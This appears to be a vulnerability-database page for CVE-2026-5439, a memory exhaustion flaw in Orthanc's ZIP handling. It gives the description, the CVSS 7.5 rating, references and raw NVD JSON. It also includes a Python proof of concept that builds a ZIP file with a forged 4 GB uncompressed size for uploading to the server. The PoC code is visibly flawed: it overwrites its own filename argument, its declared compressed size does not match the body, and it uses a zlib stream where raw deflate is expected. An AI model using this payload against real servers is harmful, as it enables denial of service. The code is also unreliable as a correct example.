CVE-2026-5439

Description

A memory exhaustion vulnerability exists in ZIP archive processing. Orthanc automatically extracts ZIP archives uploaded to certain endpoints and trusts metadata fields describing the uncompressed size of archived files. An attacker can craft a small ZIP archive containing a forged size value, causing the server to allocate extremely large buffers during extraction.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:orthanc-server:orthanc:*:*:*:*:*:*:*:* - VULNERABLE

Orthanc (具体版本请参考官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import struct
import os

def create_malicious_zip(filename, fake_size=0xFFFFFFFF):
    # ZIP Local file header signature
    signature = b'\x50\x4b\x03\x04'
    version = b'\x14\x00'
    flags = b'\x00\x00'
    compression = b'\x08\x00' # Deflate
    mod_time = b'\x00\x00'
    mod_date = b'\x00\x00'
    crc32 = b'\x00\x00\x00\x00'
    compressed_size = struct.pack('<I', 20)
    uncompressed_size = struct.pack('<I', fake_size)
    name_len = struct.pack('<H', 8) # "evil.txt"
    extra_len = struct.pack('<H', 0)
    filename = b'evil.txt'
    # Minimal valid deflate stream (empty block)
    body = b'\x78\x9c\x03\x00\x00\x00\x00\x01' 
    
    header = (signature + version + flags + compression + mod_time + mod_date + 
              crc32 + compressed_size + uncompressed_size + name_len + extra_len + filename)
    
    with open(filename, 'wb') as f:
        f.write(header)
        f.write(body)

create_malicious_zip('evil.zip', fake_size=0xFFFFFFFF) # Claim 4GB size

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5439
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5439
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5439/
[4] VulDB https://vuldb.com/cve/CVE-2026-5439
[5] https://kb.cert.org/vuls/id/536588
[6] https://www.machinespirits.de/
[7] https://www.orthanc-server.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5439", "sourceIdentifier": "[email protected]", "published": "2026-04-09T15:16:15.443", "lastModified": "2026-04-15T19:32:22.333", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A memory exhaustion vulnerability exists in ZIP archive processing. Orthanc automatically extracts ZIP archives uploaded to certain endpoints and trusts metadata fields describing the uncompressed size of archived files. An attacker can craft a small ZIP archive containing a forged size value, causing the server to allocate extremely large buffers during extraction."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:orthanc-server:orthanc:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.12.11", "matchCriteriaId": "A259075D-8B77-4B04-BC42-3E5ABE9DFE1F"}]}]}], "references": [{"url": "https://kb.cert.org/vuls/id/536588", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.machinespirits.de/", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.orthanc-server.com/", "source": "[email protected]", "tags": ["Product"]}]}}